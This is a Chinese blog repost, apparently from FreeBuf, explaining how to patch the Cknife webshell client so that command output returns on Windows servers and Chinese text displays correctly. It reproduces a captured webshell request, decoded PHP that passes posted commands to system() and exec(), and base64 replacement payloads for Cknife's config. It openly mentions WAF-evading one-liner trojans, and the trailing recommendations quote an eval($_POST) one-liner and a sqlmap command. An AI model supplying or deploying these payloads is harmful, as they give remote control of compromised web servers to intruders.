c php乱码,Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

最新推荐文章于 2024-05-12 09:37:37 发布
最新推荐文章于 2024-05-12 09:37:37 发布
阅读量335 收藏
点赞数
文章标签: c php乱码

在现在满大街菜刀都存在后门问题的时候,Cknife横空出世了。因为开源,所以安全。因为可操作的空间挺大的,也十分适合过各种WAF。下面就是解决两个常见问题的过程。希望可以帮到各位白帽子。

但是使用过程中也遇到了一些小问题,被吐槽最多的就是中文乱码以及部分Windows环境shell无法回显。下面我来分析过程,解决问题:首先是shell回显问题,shell在部分windows环境中是不能执行cmd的

22b3698eff14a0106953e5f98c028553.png

哇,气死人了。

昨晚写出来了配套的过狗过D盾过360一句话木马,也把Cknife的数据做了加密。

然而,这东西根本无法好好使用啊!

测试一句话(服务端):

于是给Cknife,连接shell,打开burp抓包

这是执行”whoami”时候的请求,没有返回的报文。POST /test.php HTTP/1.1

User-Agent: Java/1.8.0_121

Host: localhost

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Content-type: application/x-www-form-urlencoded

Content-Length: 598

Connection: close

a=QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw== &action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d&z1=Y21k&z2=Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0%3d

本地模拟了服务端处理客户端请求的场景<?php

//客户端发送请求

$_POST['a'] = 'QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbYWN0aW9uXSkpOw==';

$_POST['z1']='Y21k';

$_POST['z2']='Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=';

$_POST['action']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw==';

//服务端

eval(base64_decode($_POST['a']).';');

8cdef3c6cc41556a5e5486db7d3b5e86.png

然后Base64解码<?php

$_POST['z1']='Y21k';

$_POST['z2']='Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0=';

eval('

@ini_set("display_errors","0");

@set_time_limit(0);

@set_magic_quotes_runtime(0);

echo("->|");;

$p=base64_decode($_POST["z1"]);

$s=base64_decode($_POST["z2"]);

$d=dirname($_SERVER["SCRIPT_FILENAME"]);

$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";

system($r." 2>&1",$ret);

print ($ret!=0)?"ret={$ret}":"";;

echo("|

');

这就通过短短一句话木马来做事情的秘密了。

特么的!最坑的地方知道是什么吗!我找了一晚上!

看似很正常对吧?$p = ‘cmd’;

$c= ‘whoami’; (举例)

$r="{$p} {$c}";

然后system($r);

一切都很完美吧?

那你就错了,因为

208098998fffb7593ecb3f3ba5925267.png

呵呵,所以shell环境是Windows的时候有可能发生这种低级问题,

你!根!本!执!行!不!了!命!令!

解决起来也很简单

明文修改部分就行了!<?php

$_POST['z1']='Y21k';

$_POST['z2']='Y2QvZCJEOlxwaHBTdHVkeVxXV1dcIiZkaXImZWNobyBbU10mY2QmZWNobyBbRV0=';

eval('

@ini_set("display_errors","0");

@set_time_limit(0);

@set_magic_quotes_runtime(0);

echo("->|");;

$p=base64_decode($_POST["z1"]);

$s=base64_decode($_POST["z2"]);

$d=dirname($_SERVER["SCRIPT_FILENAME"]);

$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";

$r="{$s}";

system($r." 2>&1",$ret);print ($ret!=0)?"

ret={$ret}

":"";;echo("|

');

实际操作只需要

打开c刀的Config.ini文件,查找  “php_shell=”

5b01a95ad954637bd5caefd43890e209.png

修改成PHP_SHELL=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwpAc2V0X3RpbWVfbGltaXQoMCk7CkBzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7CmVjaG8oIi0%2bfCIpOzsKJHA9KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MSJdKSk7CiRzPShiYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSkpOwokZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7CiRjPXN1YnN0cigkZCwwLDEpPT0iLyI/Ii1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOwokYz0kczsKJHI9InskY30iOwpzeXN0ZW0oJHIuIiAyPiYxIiwkcmV0KTtwcmludCAoJHJldCE9MCk/IgpyZXQ9eyRyZXR9CiI6IiI7O2VjaG8oInw8LSIpO2RpZSgpOw%3d%3d

就行了,然后重新打开一次C刀。大功告成。

af838f5d00a531b45598ee84750bdf64.png

这只是第一部分,回显中有中文依旧会乱码,于是就有了后半部分文章

中文乱码解决

df39ff29216e979bb58c92361984f31b.png

抓包,得到数据,可以看到,本地模拟的情况下。system函数执行的回显是乱码的。

后来经过测试,是编码的问题 ,把编码修改成utf-8即可显示中文啦~

下面是具体操作

并且需要把system函数修改成exec函数,用来把回显赋值给变量

8189d632dce6b3649722a8bb00a1e340.png

修改部分exec($r." 2>&1",$retn,$retn2);

foreach($retn as $res) {

$res = iconv("GBK", "UTF-8", $res);

echo $res;

echo "\n";

};

即可正常显示中文

修改cknife目录下的config文件中的php_shell为修改部分 PHP_SHELL=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwpAc2V0X3RpbWVfbGltaXQoMCk7CkBzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7CmVjaG8oIi0%2bfCIpOzsKJHA9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokcz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTsKJGM9c3Vic3RyKCRkLDAsMSk9PSIvIj8iLWMgXCJ7JHN9XCIiOiIvYyBcInskc31cIiI7CiRyPSJ7JHN9IjsKZXhlYygkci4iIDI%2bJjEiLCRyZXRuLCRyZXRuMik7CmZvcmVhY2goJHJldG4gYXMgJHJlcykgewogICAgJHJlcyA9IGljb252KCJHQksiLCAiVVRGLTgiLCAkcmVzKTsKICAgIGVjaG8gJHJlczsKICAgIGVjaG8gIlxuIjsKfTsKZWNobyAkcmV0bjI7CnByaW50ICgkcmV0bjIhPTApPyJyZXRuMj17JHJldG4yfSI6IiI7OwplY2hvKCJ8PC0iKTsKZGllKCk7

即可正常回显中文啦~

a8b2529bc31fdb36daad83176f290fa8.png

*本文作者:Lz1y,转载请注明FreeBuf.COM

噢萨卡
关注
php exec回显_木马小工具(php版)——网页操控肉鸡服务器
weixin_39620197的博客
12-21 548
如何通过一个文本文件的网页来控制服务器呢?在服务器上执行命令在网页上返回执行结果使用思路基于web的木马上传到靶机的apache服务器中通过web访问将命令传给木马木马接收命令在服务器端执行将执行结果(服务器的信息)返回到web页面上使用的php函数php执行shell/cmd命令,可以使用下面几个函数: stringsystem(string$command[,int&...
2021-11-6完整linux内网渗透实战笔记(域/非域对于linux其实区别不大+宝塔后台渗透+稻壳DocCMSsql注入+交互式shell用python解决乱码问题)
qq_45290991的博客
11-14 7162
外网打点发现web服务器有: DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper: sqlmap.py -u "http://网站ip/search/?keyword=123" --tamper=chardoubleencode 代码审计之_doccms2016漏洞_whojoe的博客-CSDN博客 代码审计之DocCms漏洞分析-阿里云开发者社区 得到:current user: 'www_ddd4_com@localhost' sqlmap identifie.
cknife Java开发的类菜刀工具,又名C刀
02-27
cknife Java开发的类菜刀工具,又名C刀
php加刀过狗,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗
weixin_34598113的博客
03-19 200
SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel设置皮肤为nimbusSPL=->| 表示截取数据的开始符号SPR=|除了修改以上参数过WAF外,程序还额外提供了一种Customize过WAF的模式。Customize模式原本是用于支持一些程序默认不支持的脚...
PHP打印shell输出,php如何实时显示shell脚本的输出
weixin_39747511的博客
03-10 751
大家好,我现在有一个shell脚本,实现的是一键启动的功能。想要把它做成web版但是这个脚本执行的时间较长,大概要2-3分钟,期间会echo一些成功的提示信息至屏幕上但是现在用php来调这个脚本,用的是exec和system,发现要一直等这个脚本全部执行完之后才会在网页上打印出语句现在我的问题是,可不可以shell打印出一条语句网页上就显示出一条语句,而不是等shell全部执行完后一起显示谢谢大家...
Cknife的安装
北冥有鱼
04-28 9850
下载菜刀,打开Cknife.jar软件 注意:这里的菜刀文件存放的目录不要带有中文 打开 没错,这是我们熟悉的pikachu 但是这个网站的上传漏洞我还没学,所以暂时没法操作(等发了上传漏洞的视频我就来改) 基本思路就是 我可以在这里 绕过上传(通过burp抓包,改包,放包),把这个<?php @eval($_POST['pass']);?> 上传了,然后用菜刀,连接到这个网址下...
2010最新php免杀木马乱码优化版下载
02-24
这样就不会出现修改文件的时候出现中文乱码 1、超强的cookie功能。 2、加强文件管理功能,增加批量删除文件。增加 新的文件属性显示方式和宿主。增加目录改名 。增加查看网站根目录和当前目录下的所有可 写子目录...
x shell 串口乱码
09-04
6. 软件设置错误:检查X Shell的设置选项,例如是否开启了自动换行、本地回显功能,这些设置可能会导致乱码显示。 综上所述,针对X Shell串口乱码问题,需要逐一排查可能的原因,并逐步进行调试和解决。如果还...
Cknife 一句话连接工具.7z
07-17
Cknife里面有1.jsp一句话,以及nsa工具,在kali下java1.8下测试通过
cknife-master.zip
10-19
cknife-master
Cknife-modified-java9可用.rar
12-21
Cknife源码从 Chora && MelodyZX 的GitHub 上获得,本人对涉及BASE64ENCODER的代码做了修改以适应java9版本。 下载后用eclipse导入项目(project),编译运行src/com/ms509/ui下的Cknife.java即可。
cknife连接失败
m0_52432191的博客
05-23 471
这是什么原因啊
探索网络安全的新边界:Cknife,你的智能渗透测试瑞士军刀!
gitblog_00006的博客
05-12 594
探索网络安全的新边界:Cknife,你的智能渗透测试瑞士军刀! 项目地址:https://gitcode.com/Chora10/Cknife 1、项目介绍 Cknife,又称为"C刀",是一个高效、灵活的渗透测试工具,专为安全研究人员和系统管理员设计。作为一款开源的Java应用,Cknife 提供了全面的服务端脚本支持,旨在简化渗透测试过程,协助提高Web应用程序防火墙(WA...
linux 安全狗 乱码,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗
weixin_36424744的博客
05-09 378
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!相关阅读:0x00 前言很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实小伙伴们还没有用到精髓之处,她其实也是一款过WAF的利器。没有给大家讲解如何去使用它这是我的责任,我是一个有责任心的基佬,我会对大家负责的,于是有了下面的文章:0x01 两种方法Cknife有两种过...
打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)
qq_28247467的博客
03-30 1562
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 0×00 前言 亲爱的Chora小伙伴在上文说过,他是一个有责任心的基佬,要手把手为大家(不)负责任的讲解如何使用Cknife。于是他挥动着小皮鞭,给了身为小弟(弟)的我24小时速成JSP、ASP.NET。在这种极度威逼利诱之下,我不负责任的攒出了绕狗第二式,内容过于冗长,还望请各位看官耐着性子,看
Cknife与一句话木马提权
0xcc'Blog
04-28 3043
Cknife:一个管理网站的工具,支持动态脚本的网站的管理,用来连接一句话木马 一句话木马:一句恶意代码,可以是某种脚本语言,用来与客户端建立联系 通过中国菜刀连接一句话木马达到拿下网站webshell ...
vue上传的txt文件,回显后,点击预览,txt文件乱码问题怎么解决
最新发布
09-26
当你在Vue应用中上传TXT文件并试图显示其内容时,遇到乱码问题通常是由于编码不匹配导致的。解决这个问题需要以下几个步骤: 1. **检查编码**:首先,确认上传的TXT文件原始编码是什么。可以在文本编辑器中查看编码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值